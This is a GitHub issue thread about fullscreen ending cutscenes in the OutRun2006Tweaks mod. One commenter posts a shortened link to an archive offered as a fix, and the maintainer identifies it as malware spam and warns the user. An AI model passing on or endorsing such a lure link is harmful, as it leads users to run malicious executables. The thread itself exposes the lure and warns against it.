### ISSUE TITLE
[Bug]: Full screen endings?

### ISSUE THREAD

**Issue by Outrunner24** [emoose/OutRun2006Tweaks#145] opened 2024-09-19 10:10 UTC
### Tweaks version

0.6.1

### Describe your issue here (please attach the OutRun2006Tweaks.log file with your report, you can drag+drop it into the text area)

In the [latest release post](https://github.com/emoose/OutRun2006Tweaks/releases/tag/v0.6.1), the ending cutscene(s) go fullscreen but I still see them in a tiny window. Is there some .INI setting for this? 

Thanks and congrats on the progress made so far 👍

**Comment by Aljallaf100** [comment] 2024-09-19 10:11
This might help:This file might fix it
https://bit.ly/3XQLHlH
I put the necessary dlls in the archive

**Comment by Outrunner24** [comment] 2024-09-19 10:28
> This file might fix it 

Nope, still letterboxed on the left ot the credits roll.

**Comment by Tenome** [comment] 2024-09-19 10:55
So far, that's only possible by using cheat engine. I made a suggestion thread for it here. So this should also be changed to "Feature Request," or closed as a duplicate lol.

https://github.com/emoose/OutRun2006Tweaks/issues/136

**Comment by emoose** [comment] 2024-09-19 12:18
>This file might fix it
>Nope, still letterboxed on the left ot the credits roll.

I think that was a malware reply, you might want to do a virus check if you ran the EXE they posted, there's a lot of this malware spam on github lately :/

**Comment by lance8765** [comment] 2024-09-19 13:28
Who's the idiot this time? *sigh*

**Comment by Outrunner24** [comment] 2024-09-19 13:32
> Who's the idiot this time? Sigh...

Me probably 😑 I've been online for ages and I still trust random .EXE files like a 10yr old.

**Comment by emoose** [comment] 2024-09-21 07:37
Duplicate of #136

**Closed by emoose** 2024-09-21 07:37 UTC
Labels: bug
